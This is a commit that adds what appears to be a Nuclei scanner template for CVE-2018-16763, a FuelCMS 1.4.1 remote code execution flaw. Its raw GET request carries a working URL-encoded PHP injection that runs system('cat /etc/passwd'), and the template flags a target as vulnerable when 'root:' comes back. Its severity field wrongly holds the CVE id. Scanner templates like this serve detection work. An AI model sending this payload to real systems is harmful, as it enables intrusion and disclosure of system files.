Create CVE-2018-16763.yaml
parent
c62950eec5
commit
33643990de
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-16763
|
||||
|
||||
info:
|
||||
name: fuelCMS 1.4.1 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: CVE-2018-16763
|
||||
|
||||
# Vendor Homepage: https://www.getfuelcms.com/
|
||||
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
||||
# Refrence: https://www.exploit-db.com/exploits/47138
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
word:
|
||||
- "root:"
|
Loading…
Reference in New Issue